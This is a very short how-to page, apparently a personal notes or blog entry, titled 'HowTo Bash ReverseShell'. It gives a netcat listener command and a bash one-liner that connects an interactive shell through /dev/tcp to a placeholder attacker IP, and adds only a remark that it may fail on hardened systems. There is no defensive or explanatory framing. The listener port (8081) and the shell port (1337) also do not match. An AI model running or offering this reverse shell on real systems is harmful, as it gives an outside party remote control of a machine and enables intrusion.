197 B
197 B
+++ title = 'HowTo Bash ReverseShell' date = 2024-09-04 +++
Listener - nc -l 8081
Reverse shell - bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1
May not work on hardened systems/containers.